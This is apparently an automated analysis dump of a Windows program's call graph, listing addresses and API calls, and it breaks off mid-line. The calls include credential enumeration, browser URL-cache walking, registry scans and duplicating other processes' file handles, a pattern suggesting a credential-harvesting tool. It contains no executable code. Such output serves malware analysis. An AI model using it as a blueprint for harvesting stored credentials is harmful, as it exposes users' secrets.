wcscpy wcscpy wcscpy CloseHandle 38153->38222 38154->38153 38156 411b67 38223 402afb 38156->38223 38160 411b7f 38279 40ea13 SendMessageW memset SendMessageW 38160->38279 38163 402afb 27 API calls 38162->38163 38164 411ac0 38163->38164 38165 4110dc 38164->38165 38166 41113e 38165->38166 38171 4110f0 38165->38171 38304 40969c LoadCursorW SetCursor 38166->38304 38168 411143 38305 4032b4 38168->38305 38323 444a54 38168->38323 38169 4110f7 _wcsicmp 38169->38171 38170 411157 38172 40ada2 _wcsicmp 38170->38172 38171->38166 38171->38169 38326 410c46 10 API calls 38171->38326 38175 411167 38172->38175 38173 4111af 38175->38173 38176 4111a6 qsort 38175->38176 38176->38173 38179->37979 38181 40eb10 38180->38181 38194 40e8e0 38181->38194 38184 40eb6c memcpy memcpy 38185 40ebe1 38184->38185 38186 40ebb7 38184->38186 38185->38184 38187 40ebf2 ??2@YAPAXI ??2@YAPAXI 38185->38187 38186->38185 38188 40d134 16 API calls 38186->38188 38189 40ec2e ??2@YAPAXI 38187->38189 38192 40ec65 38187->38192 38188->38186 38189->38192 38204 40ea7f 38192->38204 38193 402f49 38193->37979 38195 40e8f2 38194->38195 38196 40e8eb ??3@YAXPAX 38194->38196 38197 40e900 38195->38197 38198 40e8f9 ??3@YAXPAX 38195->38198 38196->38195 38199 40e90a ??3@YAXPAX 38197->38199 38201 40e911 38197->38201 38198->38197 38199->38201 38200 40e931 ??2@YAPAXI ??2@YAPAXI 38200->38184 38201->38200 38202 40e921 ??3@YAXPAX 38201->38202 38203 40e92a ??3@YAXPAX 38201->38203 38202->38203 38203->38200 38205 40aa04 free 38204->38205 38206 40ea88 38205->38206 38207 40aa04 free 38206->38207 38208 40ea90 38207->38208 38209 40aa04 free 38208->38209 38210 40ea98 38209->38210 38211 40aa04 free 38210->38211 38212 40eaa0 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40eab3 38213->38214 38215 40a9ce 4 API calls 38214->38215 38216 40eabd 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40eac7 38217->38218 38219 40a9ce 4 API calls 38218->38219 38220 40ead1 38219->38220 38220->38193 38221->38152 38222->38156 38280 40b2cc 38223->38280 38225 402b0a 38226 40b2cc 27 API calls 38225->38226 38227 402b23 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b3a 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b54 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b6b 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b82 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402b99 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402bb0 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402bc7 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bde 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402bf5 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c0c 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c23 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c3a 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c51 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c68 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c7f 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402c99 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402cb3 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402cd5 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402cf0 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d0b 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d26 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d3e 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d59 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d78 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402d93 38276->38277 38278 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38277->38278 38278->38160 38279->38150 38283 40b58d 38280->38283 38282 40b2d1 38282->38225 38284 40b5a4 GetModuleHandleW FindResourceW 38283->38284 38285 40b62e 38283->38285 38286 40b5c2 LoadResource 38284->38286 38288 40b5e7 38284->38288 38285->38282 38287 40b5d0 SizeofResource LockResource 38286->38287 38286->38288 38287->38288 38288->38285 38296 40afcf 38288->38296 38290 40b608 memcpy 38299 40b4d3 memcpy 38290->38299 38292 40b61e 38300 40b3c1 18 API calls 38292->38300 38294 40b626 38301 40b04b 38294->38301 38297 40b04b ??3@YAXPAX 38296->38297 38298 40afd7 ??2@YAPAXI 38297->38298 38298->38290 38299->38292 38300->38294 38302 40b051 ??3@YAXPAX 38301->38302 38303 40b05f 38301->38303 38302->38303 38303->38285 38304->38168 38306 4032c4 38305->38306 38307 40b633 free 38306->38307 38308 403316 38307->38308 38327 44553b 38308->38327 38312 403480 38525 40368c 15 API calls 38312->38525 38314 403489 38315 40b633 free 38314->38315 38316 403495 38315->38316 38316->38170 38317 4033a9 memset memcpy 38318 4033ec wcscmp 38317->38318 38319 40333c 38317->38319 38318->38319 38319->38312 38319->38317 38319->38318 38523 4028e7 11 API calls 38319->38523 38524 40f508 6 API calls 38319->38524 38322 403421 _wcsicmp 38322->38319 38324 444a64 FreeLibrary 38323->38324 38325 444a83 38323->38325 38324->38325 38325->38170 38326->38171 38328 445548 38327->38328 38329 445599 38328->38329 38526 40c768 38328->38526 38330 4455a8 memset 38329->38330 38338 4457f2 38329->38338 38609 403988 38330->38609 38336 4455e5 38351 445672 38336->38351 38356 44560f 38336->38356 38341 445854 38338->38341 38711 403e2d memset memset memset memset memset 38338->38711 38339 4458bb memset memset 38343 414c2e 14 API calls 38339->38343 38385 4458aa 38341->38385 38734 403c9c memset memset memset memset memset 38341->38734 38342 44595e memset memset 38346 414c2e 14 API calls 38342->38346 38347 4458f9 38343->38347 38345 445a00 memset memset 38757 414c2e 38345->38757 38354 44599c 38346->38354 38355 40b2cc 27 API calls 38347->38355 38348 44558c 38593 444b06 38348->38593 38349 44557a 38349->38348 38804 4136c0 CoTaskMemFree 38349->38804 38620 403fbe memset memset memset memset memset 38351->38620 38364 40b2cc 27 API calls 38354->38364 38365 445909 38355->38365 38367 4087b3 337 API calls 38356->38367 38358 445bca 38366 445c8b memset memset 38358->38366 38422 445cf0 38358->38422 38359 445b38 memset memset memset 38370 445bd4 38359->38370 38371 445b98 38359->38371 38360 445849 38820 40b1ab free free 38360->38820 38379 4459ac 38364->38379 38376 409d1f 6 API calls 38365->38376 38380 414c2e 14 API calls 38366->38380 38377 445621 38367->38377 38368 445585 38805 41366b FreeLibrary 38368->38805 38369 44589f 38821 40b1ab free free 38369->38821 38374 414c2e 14 API calls 38370->38374 38371->38370 38382 445ba2 38371->38382 38372 40b2cc 27 API calls 38384 445a4f 38372->38384 38387 445be2 38374->38387 38375 403335 38522 4452e5 45 API calls 38375->38522 38390 445919 38376->38390 38806 4454bf 20 API calls 38377->38806 38378 445823 38378->38360 38400 4087b3 337 API calls 38378->38400 38391 409d1f 6 API calls 38379->38391 38392 445cc9 38380->38392 38891 4099c6 wcslen 38382->38891 38383 4456b2 38808 40b1ab free free 38383->38808 38770 409d1f wcslen wcslen 38384->38770 38385->38339 38419 44594a 38385->38419 38398 40b2cc 27 API calls 38387->38398 38388 445d3d 38418 40b2cc 27 API calls 38388->38418 38389 445d88 memset memset memset 38401 414c2e 14 API calls 38389->38401 38822 409b98 GetFileAttributesW 38390->38822 38402 4459bc 38391->38402 38403 409d1f 6 API calls 38392->38403 38393 445879 38393->38369 38404 4087b3 337 API calls 38393->38404 38395 445bb3 38894 445403 memset 38395->38894 38396 445680 38396->38383 38643 4087b3 memset 38396->38643 38407 445bf3 38398->38407 38400->38378 38410 445dde 38401->38410 38887 409b98 GetFileAttributesW 38402->38887 38412 445ce1 38403->38412 38404->38393 38417 409d1f 6 API calls 38407->38417 38408 445928 38408->38419 38823 40b6ef 38408->38823 38420 40b2cc 27 API calls 38410->38420 38911 409b98 GetFileAttributesW 38412->38911 38416 40b2cc 27 API calls 38424 445a94 38416->38424 38426 445c07 38417->38426 38427 445d54 _wcsicmp 38418->38427 38419->38342 38431 4459ed 38419->38431 38430 445def 38420->38430 38421 4459cb 38421->38431 38438 40b6ef 249 API calls 38421->38438 38422->38375 38422->38388 38422->38389 38423 445389 255 API calls 38423->38358 38775 40ae18 38424->38775 38425 44566d 38425->38338 38694 413d4c 38425->38694 38434 445389 255 API calls 38426->38434 38435 445d71 38427->38435 38499 445d67 38427->38499 38429 445665 38807 40b1ab free free 38429->38807 38436 409d1f 6 API calls 38430->38436 38431->38345 38472 445b22 38431->38472 38440 445c17 38434->38440 38912 445093 23 API calls 38435->38912 38443 445e03 38436->38443 38438->38431 38439 4456d8 38445 40b2cc 27 API calls 38439->38445 38446 40b2cc 27 API calls 38440->38446 38442 44563c 38442->38429 38448 4087b3 337 API calls 38442->38448 38913 409b98 GetFileAttributesW 38443->38913 38444 40b6ef 249 API calls 38444->38375 38450 4456e2 38445->38450 38451 445c23 38446->38451 38447 445d83 38447->38375 38448->38442 38809 413fa6 _wcsicmp _wcsicmp 38450->38809 38455 409d1f 6 API calls 38451->38455 38453 445e12 38460 445e6b 38453->38460 38467 40b2cc 27 API calls 38453->38467 38458 445c37 38455->38458 38456 445aa1 38459 445b17 38456->38459 38476 445ab2 memset 38456->38476 38490 409d1f 6 API calls 38456->38490 38782 40add4 38456->38782 38787 445389 38456->38787 38796 40ae51 38456->38796 38457 4456eb 38463 4456fd memset memset memset memset 38457->38463 38464 4457ea 38457->38464 38465 445389 255 API calls 38458->38465 38888 40aebe 38459->38888 38915 445093 23 API calls 38460->38915 38810 409c70 wcscpy wcsrchr 38463->38810 38813 413d29 38464->38813 38471 445c47 38465->38471 38473 445e33 38467->38473 38469 445e7e 38475 445f67 38469->38475 38478 40b2cc 27 API calls 38471->38478 38472->38358 38472->38359 38474 409d1f 6 API calls 38473->38474 38479 445e47 38474->38479 38480 40b2cc 27 API calls 38475->38480 38481 40b2cc 27 API calls 38476->38481 38483 445c53 38478->38483 38914 409b98 GetFileAttributesW 38479->38914 38485 445f73 38480->38485 38481->38456 38482 409c70 2 API calls 38486 44577e 38482->38486 38487 409d1f 6 API calls 38483->38487 38489 409d1f 6 API calls 38485->38489 38491 409c70 2 API calls 38486->38491 38492 445c67 38487->38492 38488 445e56 38488->38460 38496 445e83 memset 38488->38496 38493 445f87 38489->38493 38490->38456 38494 44578d 38491->38494 38495 445389 255 API calls 38492->38495 38918 409b98 GetFileAttributesW 38493->38918 38494->38464 38501 40b2cc 27 API calls 38494->38501 38495->38358 38500 40b2cc 27 API calls 38496->38500 38499->38375 38499->38444 38502 445eab 38500->38502 38503 4457a8 38501->38503 38504 409d1f 6 API calls 38502->38504 38505 409d1f 6 API calls 38503->38505 38506 445ebf 38504->38506 38507 4457b8 38505->38507 38508 40ae18 9 API calls 38506->38508 38812 409b98 GetFileAttributesW 38507->38812 38518 445ef5 38508->38518 38510 4457c7 38510->38464 38511 4087b3 337 API calls 38510->38511 38511->38464 38512 40ae51 9 API calls 38512->38518 38513 445f5c 38514 40aebe FindClose 38513->38514 38514->38475 38515 40add4 2 API calls 38515->38518 38516 40b2cc 27 API calls 38516->38518 38517 409d1f 6 API calls 38517->38518 38518->38512 38518->38513 38518->38515 38518->38516 38518->38517 38520 445f3a 38518->38520 38916 409b98 GetFileAttributesW 38518->38916 38917 445093 23 API calls 38520->38917 38522->38319 38523->38322 38524->38319 38525->38314 38527 40c775 38526->38527 38919 40b1ab free free 38527->38919 38529 40c788 38920 40b1ab free free 38529->38920 38531 40c790 38921 40b1ab free free 38531->38921 38533 40c798 38534 40aa04 free 38533->38534 38535 40c7a0 38534->38535 38922 40c274 memset 38535->38922 38540 40a8ab 9 API calls 38541 40c7c3 38540->38541 38542 40a8ab 9 API calls 38541->38542 38543 40c7d0 38542->38543 38951 40c3c3 38543->38951 38547 40c7e5 38548 40c877 38547->38548 38549 40c86c 38547->38549 38974 40a706 wcslen memcpy 38547->38974 38976 40c634 49 API calls 38547->38976 38556 40bdb0 38548->38556 38977 4053fe 39 API calls 38549->38977 38552 40c813 _wcslwr 38975 40c634 49 API calls 38552->38975 38554 40c829 wcslen 38554->38547 39137 404363 38556->39137 38559 40bf5d 39157 40440c 38559->39157 38561 40bdee 38561->38559 38564 40b2cc 27 API calls 38561->38564 38562 40bddf CredEnumerateW 38562->38561 38565 40be02 wcslen 38564->38565 38565->38559 38572 40be1e 38565->38572 38566 40be26 wcsncmp 38566->38572 38569 40be7d memset 38570 40bea7 memcpy 38569->38570 38569->38572 38571 40bf11 wcschr 38570->38571 38570->38572 38571->38572 38572->38559 38572->38566 38572->38569 38572->38570 38572->38571 38573 40b2cc 27 API calls 38572->38573 38575 40bf43 LocalFree 38572->38575 39160 40bd5d 28 API calls 38572->39160 39161 404423 38572->39161 38574 40bef6 _wcsnicmp 38573->38574 38574->38571 38574->38572 38575->38572 38576 4135f7 39174 4135e0 38576->39174 38579 40b2cc 27 API calls 38580 41360d 38579->38580 38581 40a804 8 API calls 38580->38581 38582 413613 38581->38582 38583 41361b 38582->38583 38584 41363e 38582->38584 38586 40b273 27 API calls 38583->38586 38585 4135e0 FreeLibrary 38584->38585 38587 413643 38585->38587 38588 413625 GetProcAddress 38586->38588 38587->38349 38588->38584 38589 413648 38588->38589 38590 413658 38589->38590 38591 4135e0 FreeLibrary 38589->38591 38590->38349 38592 413666 38591->38592 38592->38349 39177 4449b9 38593->39177 38596 444c1f 38596->38329 38597 4449b9 42 API calls 38599 444b4b 38597->38599 38598 444c15 38600 4449b9 42 API calls 38598->38600 38599->38598 39198 444972 GetVersionExW 38599->39198 38600->38596 38602 444b99 memcmp 38607 444b8c 38602->38607 38603 444c0b 39202 444a85 42 API calls 38603->39202 38607->38602 38607->38603 39199 444aa5 42 API calls 38607->39199 39200 40a7a0 GetVersionExW 38607->39200 39201 444a85 42 API calls 38607->39201 38610 40399d 38609->38610 39203 403a16 38610->39203 38612 403a09 39217 40b1ab free free 38612->39217 38614 4039a3 38614->38612 38618 4039f4 38614->38618 39214 40a02c CreateFileW 38614->39214 38615 403a12 wcsrchr 38615->38336 38618->38612 38619 4099c6 2 API calls 38618->38619 38619->38612 38621 414c2e 14 API calls 38620->38621 38622 404048 38621->38622 38623 414c2e 14 API calls 38622->38623 38624 404056 38623->38624 38625 409d1f 6 API calls 38624->38625 38626 404073 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 40408e 38627->38628 38629 409d1f 6 API calls 38628->38629 38630 4040a6 38629->38630 38631 403af5 20 API calls 38630->38631 38632 4040ba 38631->38632 38633 403af5 20 API calls 38632->38633 38634 4040cb 38633->38634 39244 40414f memset 38634->39244 38636 4040e0 38637 404140 38636->38637 38639 4040ec memset 38636->38639 38641 4099c6 2 API calls 38636->38641 38642 40a8ab 9 API calls 38636->38642 39258 40b1ab free free 38637->39258 38639->38636 38640 404148 38640->38396 38641->38636 38642->38636 39271 40a6e6 WideCharToMultiByte 38643->39271 38645 4087ed 39272 4095d9 memset 38645->39272 38648 408809 memset memset memset memset memset 38649 40b2cc 27 API calls 38648->38649 38650 4088a1 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 4088b1 38651->38652 38653 40b2cc 27 API calls 38652->38653 38654 4088c0 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 4088d0 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 4088df 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 4088ef 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 4088fe 38661->38662 38663 409d1f 6 API calls 38662->38663 38664 40890e 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 40891d 38665->38666 38667 409d1f 6 API calls 38666->38667 38668 40892d 38667->38668 39291 409b98 GetFileAttributesW 38668->39291 38670 40893e 38671 408943 38670->38671 38672 408958 38670->38672 39292 407fdf 75 API calls 38671->39292 39293 409b98 GetFileAttributesW 38672->39293 38675 408964 38676 408969 38675->38676 38677 40897b 38675->38677 39294 4082c7 198 API calls 38676->39294 39295 409b98 GetFileAttributesW 38677->39295 38680 408987 38681 4089a1 38680->38681 38682 40898c 38680->38682 39297 409b98 GetFileAttributesW 38681->39297 39296 408560 29 API calls 38682->39296 38692 408953 38692->38396 38695 40b633 free 38694->38695 38696 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38695->38696 38697 413f00 Process32NextW 38696->38697 38698 413da5 OpenProcess 38697->38698 38699 413f17 CloseHandle 38697->38699 38700 413df3 memset 38698->38700 38703 413eb0 38698->38703 38699->38439 39571 413f27 38700->39571 38702 413ebf free 38702->38703 38703->38697 38703->38702 38704 4099f4 3 API calls 38703->38704 38704->38703 38705 413e37 GetModuleHandleW 38707 413e46 GetProcAddress 38705->38707 38708 413e1f 38705->38708 38707->38708 38708->38705 39576 413959 38708->39576 39592 413ca4 38708->39592 38710 413ea2 CloseHandle 38710->38703 38712 414c2e 14 API calls 38711->38712 38713 403eb7 38712->38713 38714 414c2e 14 API calls 38713->38714 38715 403ec5 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403ee2 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 403efd 38718->38719 38720 409d1f 6 API calls 38719->38720 38721 403f15 38720->38721 38722 403af5 20 API calls 38721->38722 38723 403f29 38722->38723 38724 403af5 20 API calls 38723->38724 38725 403f3a 38724->38725 38726 40414f 33 API calls 38725->38726 38727 403f4f 38726->38727 38728 403faf 38727->38728 38730 403f5b memset 38727->38730 38732 4099c6 2 API calls 38727->38732 38733 40a8ab 9 API calls 38727->38733 39606 40b1ab free free 38728->39606 38730->38727 38731 403fb7 38731->38378 38732->38727 38733->38727 38735 414c2e 14 API calls 38734->38735 38736 403d26 38735->38736 38737 414c2e 14 API calls 38736->38737 38738 403d34 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d51 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d6c 38741->38742 38743 409d1f 6 API calls 38742->38743 38744 403d84 38743->38744 38745 403af5 20 API calls 38744->38745 38746 403d98 38745->38746 38747 403af5 20 API calls 38746->38747 38748 403da9 38747->38748 38749 40414f 33 API calls 38748->38749 38755 403dbe 38749->38755 38750 403e1e 39607 40b1ab free free 38750->39607 38751 403dca memset 38751->38755 38753 403e26 38753->38393 38754 4099c6 2 API calls 38754->38755 38755->38750 38755->38751 38755->38754 38756 40a8ab 9 API calls 38755->38756 38756->38755 38758 414b81 9 API calls 38757->38758 38759 414c40 38758->38759 38760 414c73 memset 38759->38760 39608 409cea 38759->39608 38764 414c94 38760->38764 38763 414c64 38763->38372 38765 414cf4 wcscpy 38764->38765 39611 414bb0 wcscpy 38764->39611 38765->38763 38767 414cd2 39612 4145ac RegQueryValueExW 38767->39612 38769 414ce9 38769->38765 38771 409d43 wcscpy 38770->38771 38773 409d62 38770->38773 38772 409719 2 API calls 38771->38772 38774 409d51 wcscat 38772->38774 38773->38416 38774->38773 38776 40aebe FindClose 38775->38776 38777 40ae21 38776->38777 38778 4099c6 2 API calls 38777->38778 38779 40ae35 38778->38779 38780 409d1f 6 API calls 38779->38780 38781 40ae49 38780->38781 38781->38456 38783 40ade0 38782->38783 38784 40ae0f 38782->38784 38783->38784 38785 40ade7 wcscmp 38783->38785 38784->38456 38785->38784 38786 40adfe wcscmp 38785->38786 38786->38784 38788 40ae18 9 API calls 38787->38788 38790 4453c4 38788->38790 38789 40ae51 9 API calls 38789->38790 38790->38789 38791 4453f3 38790->38791 38792 40add4 2 API calls 38790->38792 38795 445403 250 API calls 38790->38795 38793 40aebe FindClose 38791->38793 38792->38790 38794 4453fe 38793->38794 38794->38456 38795->38790 38797 40ae7b FindNextFileW 38796->38797 38798 40ae5c FindFirstFileW 38796->38798 38799 40ae94 38797->38799 38800 40ae8f 38797->38800 38798->38799 38802 40aeb6 38799->38802 38803 409d1f 6 API calls 38799->38803 38801 40aebe FindClose 38800->38801 38801->38799 38802->38456 38803->38802 38804->38368 38805->38348 38806->38442 38807->38425 38808->38425 38809->38457 38811 409c89 38810->38811 38811->38482 38812->38510 38814 413d39 38813->38814 38815 413d2f FreeLibrary 38813->38815 38816 40b633 free 38814->38816 38815->38814 38817 413d42 38816->38817 38818 40b633 free 38817->38818 38819 413d4a 38818->38819 38819->38338 38820->38341 38821->38385 38822->38408 38824 44db70 38823->38824 38825 40b6fc memset 38824->38825 38826 409c70 2 API calls 38825->38826 38827 40b732 wcsrchr 38826->38827 38828 40b743 38827->38828 38829 40b746 memset 38827->38829 38828->38829 38830 40b2cc 27 API calls 38829->38830 38831 40b76f 38830->38831 38832 409d1f 6 API calls 38831->38832 38833 40b783 38832->38833 39613 409b98 GetFileAttributesW 38833->39613 38835 40b792 38836 40b7c2 38835->38836 38838 409c70 2 API calls 38835->38838 39614 40bb98 38836->39614 38840 40b7a5 38838->38840 38843 40b2cc 27 API calls 38840->38843 38841 40b837 CloseHandle 38846 40b83e memset 38841->38846 38842 40b817 39648 409a45 GetTempPathW 38842->39648 38844 40b7b2 38843->38844 38847 409d1f 6 API calls 38844->38847 39647 40a6e6 WideCharToMultiByte 38846->39647 38847->38836 38848 40b827 38848->38846 38850 40b866 38851 444432 120 API calls 38850->38851 38852 40b879 38851->38852 38853 40b273 27 API calls 38852->38853 38854 40bad5 38852->38854 38855 40b89a 38853->38855 38856 40b04b ??3@YAXPAX 38854->38856 38857 438552 133 API calls 38855->38857 38858 40baf3 38856->38858 38859 40b8a4 38857->38859 38858->38419 38860 40bacd 38859->38860 38862 4251c4 136 API calls 38859->38862 38861 443d90 110 API calls 38860->38861 38861->38854 38885 40b8b8 38862->38885 38863 40bac6 39660 424f26 122 API calls 38863->39660 38864 40b8bd memset 39651 425413 17 API calls 38864->39651 38867 425413 17 API calls 38867->38885 38870 40a71b MultiByteToWideChar 38870->38885 38871 40a734 MultiByteToWideChar 38871->38885 38874 40b9b5 memcmp 38874->38885 38875 4099c6 2 API calls 38875->38885 38876 404423 37 API calls 38876->38885 38879 4251c4 136 API calls 38879->38885 38880 40bb3e memset memcpy 39661 40a734 MultiByteToWideChar 38880->39661 38882 40bb88 LocalFree 38882->38885 38885->38863 38885->38864 38885->38867 38885->38870 38885->38871 38885->38874 38885->38875 38885->38876 38885->38879 38885->38880 38886 40ba5f memcmp 38885->38886 39652 4253ef 16 API calls 38885->39652 39653 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38885->39653 39654 4253af 17 API calls 38885->39654 39655 4253cf 17 API calls 38885->39655 39656 447280 memset 38885->39656 39657 447960 memset memcpy memcpy memcpy 38885->39657 39658 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38885->39658 39659 447920 memcpy memcpy memcpy 38885->39659 38886->38885 38887->38421 38889 40aed1 38888->38889 38890 40aec7 FindClose 38888->38890 38889->38472 38890->38889 38892 4099d7 38891->38892 38893 4099da memcpy 38891->38893 38892->38893 38893->38395 38895 40b2cc 27 API calls 38894->38895 38896 44543f 38895->38896 38897 409d1f 6 API calls 38896->38897 38898 44544f 38897->38898 39753 409b98 GetFileAttributesW 38898->39753 38900 44545e 38901 445476 38900->38901 38903 40b6ef 249 API calls 38900->38903 38902 40b2cc 27 API calls 38901->38902 38904 445482 38902->38904 38903->38901 38905 409d1f 6 API calls 38904->38905 38906 445492 38905->38906 39754 409b98 GetFileAttributesW 38906->39754 38908 4454a1 38909 4454b9 38908->38909 38910 40b6ef 249 API calls 38908->38910 38909->38423 38910->38909 38911->38422 38912->38447 38913->38453 38914->38488 38915->38469 38916->38518 38917->38518 38918->38499 38919->38529 38920->38531 38921->38533 38923 414c2e 14 API calls 38922->38923 38924 40c2ae 38923->38924 38978 40c1d3 38924->38978 38929 40c3be 38946 40a8ab 38929->38946 38930 40afcf 2 API calls 38931 40c2fd FindFirstUrlCacheEntryW 38930->38931 38932 40c3b6 38931->38932 38933 40c31e wcschr 38931->38933 38934 40b04b ??3@YAXPAX 38932->38934 38935 40c331 38933->38935 38936 40c35e FindNextUrlCacheEntryW 38933->38936 38934->38929 38938 40a8ab 9 API calls 38935->38938 38936->38933 38937 40c373 GetLastError 38936->38937 38939 40c3ad FindCloseUrlCache 38937->38939 38940 40c37e 38937->38940 38941 40c33e wcschr 38938->38941 38939->38932 38942 40afcf 2 API calls 38940->38942 38941->38936 38943 40c34f 38941->38943 38944 40c391 FindNextUrlCacheEntryW 38942->38944 38945 40a8ab 9 API calls 38943->38945 38944->38933 38944->38939 38945->38936 39072 40a97a 38946->39072 38949 40a8cc 38949->38540 38950 40a8d0 7 API calls 38950->38949 39077 40b1ab free free 38951->39077 38953 40c3dd 38954 40b2cc 27 API calls 38953->38954 38955 40c3e7 38954->38955 38956 40c50e 38955->38956 38957 40c3ff 38955->38957 38971 405337 38956->38971 38958 40a9ce 4 API calls 38957->38958 38959 40c418 memset 38958->38959 39078 40aa1d 38959->39078 38962 40c471 38964 40c47a _wcsupr 38962->38964 38963 40c505 38963->38956 38965 40a8d0 7 API calls 38964->38965 38966 40c498 38965->38966 38967 40a8d0 7 API calls 38966->38967 38968 40c4ac memset 38967->38968 38969 40aa1d 38968->38969 38970 40c4e4 RegEnumValueW 38969->38970 38970->38963 38970->38964 39080 405220 38971->39080 38974->38552 38975->38554 38976->38547 38977->38548 38979 40ae18 9 API calls 38978->38979 38985 40c210 38979->38985 38980 40ae51 9 API calls 38980->38985 38981 40c264 38982 40aebe FindClose 38981->38982 38984 40c26f 38982->38984 38983 40add4 2 API calls 38983->38985 38990 40e5ed memset memset 38984->38990 38985->38980 38985->38981 38985->38983 38986 40c231 _wcsicmp 38985->38986 38987 40c1d3 34 API calls 38985->38987 38986->38985 38988 40c248 38986->38988 38987->38985 39003 40c084 21 API calls 38988->39003 38991 414c2e 14 API calls 38990->38991 38992 40e63f 38991->38992 38993 409d1f 6 API calls 38992->38993 38994 40e658 38993->38994 39004 409b98 GetFileAttributesW 38994->39004 38996 40e667 38997 409d1f 6 API calls 38996->38997 38999 40e680 38996->38999 38997->38999 39005 409b98 GetFileAttributesW 38999->39005 39000 40e68f 39001 40c2d8 39000->39001 39006 40e4b2 39000->39006 39001->38929 39001->38930 39003->38985 39004->38996 39005->39000 39027 40e01e 39006->39027 39008 40e593 39009 40e5b0 39008->39009 39010 40e59c DeleteFileW 39008->39010 39011 40b04b ??3@YAXPAX 39009->39011 39010->39009 39013 40e5bb 39011->39013 39012 40e521 39012->39008 39050 40e175 39012->39050 39015 40e5c4 CloseHandle 39013->39015 39016 40e5cc 39013->39016 39015->39016 39018 40b633 free 39016->39018 39017 40e573 39020 40e584 39017->39020 39021 40e57c CloseHandle 39017->39021 39019 40e5db 39018->39019 39023 40b633 free 39019->39023 39071 40b1ab free free 39020->39071 39021->39020 39022 40e540 39022->39017 39070 40e2ab 30 API calls 39022->39070 39025 40e5e3 39023->39025 39025->39001 39028 406214 22 API calls 39027->39028 39029 40e03c 39028->39029 39030 40e16b 39029->39030 39031 40dd85 74 API calls 39029->39031 39030->39012 39032 40e06b 39031->39032 39032->39030 39033 40afcf ??2@YAPAXI ??3@YAXPAX 39032->39033 39034 40e08d OpenProcess 39033->39034 39035 40e0a4 GetCurrentProcess DuplicateHandle 39034->39035 39039 40e152 39034->39039 39036 40e0d0 GetFileSize 39035->39036 39037 40e14a CloseHandle 39035->39037 39040 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39036->39040 39037->39039 39038 40e160 39042 40b04b ??3@YAXPAX 39038->39042 39039->39038 39041 406214 22 API calls 39039->39041 39043 40e0ea 39040->39043 39041->39038 39042->39030 39044 4096dc CreateFileW 39043->39044 39045 40e0f1 CreateFileMappingW 39044->39045 39046 40e140 CloseHandle CloseHandle 39045->39046 39047 40e10b MapViewOfFile 39045->39047 39046->39037 39048 40e13b CloseHandle 39047->39048 39049 40e11f WriteFile UnmapViewOfFile 39047->39049 39048->39046 39049->39048 39051 40e18c 39050->39051 39052 406b90 11 API calls 39051->39052 39053 40e19f 39052->39053 39054 40e1a7 memset 39053->39054 39055 40e299 39053->39055 39060 40e1e8 39054->39060 39056 4069a3 ??3@YAXPAX free 39055->39056 39057 40e2a4 39056->39057 39057->39022 39058 406e8f 13 API calls 39058->39060 39059 406b53 SetFilePointerEx ReadFile 39059->39060 39060->39058 39060->39059 39061 40dd50 _wcsicmp 39060->39061 39062 40e283 39060->39062 39066 40742e 8 API calls 39060->39066 39067 40aae3 wcslen wcslen _memicmp 39060->39067 39068 40e244 _snwprintf 39060->39068 39061->39060 39063 40e291 39062->39063 39064 40e288 free 39062->39064 39065 40aa04 free 39063->39065 39064->39063 39065->39055 39066->39060 39067->39060 39069 40a8d0 7 API calls 39068->39069 39069->39060 39070->39022 39071->39008 39073 40a980 39072->39073 39074 40a995 _wcsicmp 39073->39074 39075 40a99c wcscmp 39073->39075 39076 40a8bb 39073->39076 39074->39073 39075->39073 39076->38949 39076->38950 39077->38953 39079 40aa23 RegEnumValueW 39078->39079 39079->38962 39079->38963 39081 405335 39080->39081 39082 40522a 39080->39082 39081->38547 39083 40b2cc 27 API calls 39082->39083 39084 405234 39083->39084 39085 40a804 8 API calls 39084->39085 39086 40523a 39085->39086 39125 40b273 39086->39125 39088 405248 _mbscpy _mbscat GetProcAddress 39089 40b273 27 API calls 39088->39089 39090 405279 39089->39090 39128 405211 GetProcAddress 39090->39128 39092 405282 39093 40b273 27 API calls 39092->39093 39094 40528f 39093->39094 39129 405211 GetProcAddress 39094->39129 39096 405298 39097 40b273 27 API calls 39096->39097 39098 4052a5 39097->39098 39130 405211 GetProcAddress 39098->39130 39100 